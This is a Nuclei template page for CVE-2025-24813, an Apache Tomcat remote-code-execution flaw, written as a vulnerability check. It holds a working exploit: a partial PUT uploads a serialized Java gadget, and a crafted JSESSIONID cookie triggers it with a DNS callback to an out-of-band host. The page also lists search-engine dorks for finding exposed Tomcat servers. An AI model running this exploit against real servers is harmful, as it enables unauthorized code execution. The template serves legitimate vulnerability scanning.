Skip to content
Nuclei Templates

Apache Tomcat Path Equivalence - Remote Code Execution

ID: CVE-2025-24813

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch,theMiddle

Tags: cve,cve2025,apache,tomcat,rce,intrusive

Description

Section titled “Description”

Path Equivalence- ‘file.Name’ (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.

YAML Source

Section titled “YAML Source”
id: CVE-2025-24813


info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,theMiddle
  severity: critical
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
    - https://security.netapp.com/advisory/ntap-20250321-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24813
    cwe-id: CWE-44,CWE-502
    epss-score: 0.83157
    epss-percentile: 0.99253
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: tomcat
    shodan-query:
      - http.component:"apache tomcat"
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.html:"apache tomcat"
      - http.html:"jk status manager"
      - http.title:"apache tomcat"
      - product:"tomcat"
    fofa-query:
      - server=="apache tomcat"
      - body="apache tomcat"
      - body="jk status manager"
      - title="apache tomcat"
    google-query:
      - intitle:"apache tomcat"
      - site:*/examples/jsp/snp/snoop.jsp
  tags: cve,cve2025,apache,tomcat,rce,intrusive
variables:
  filename: "{{randbase(6)}}"


http:
  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457


        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}


      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=.{{filename}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"


      - type: status
        status:
          - 201
# digest: 4a0a00473045022100a185a2e442fa6f583946c204ef7d566cf394b090449ea56c2b45de0da68a03a002200841c3998f434bf45b3c633cb632c3aed82465bcbd8829583c7089cbee6fda60:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-24813.yaml"

View on Github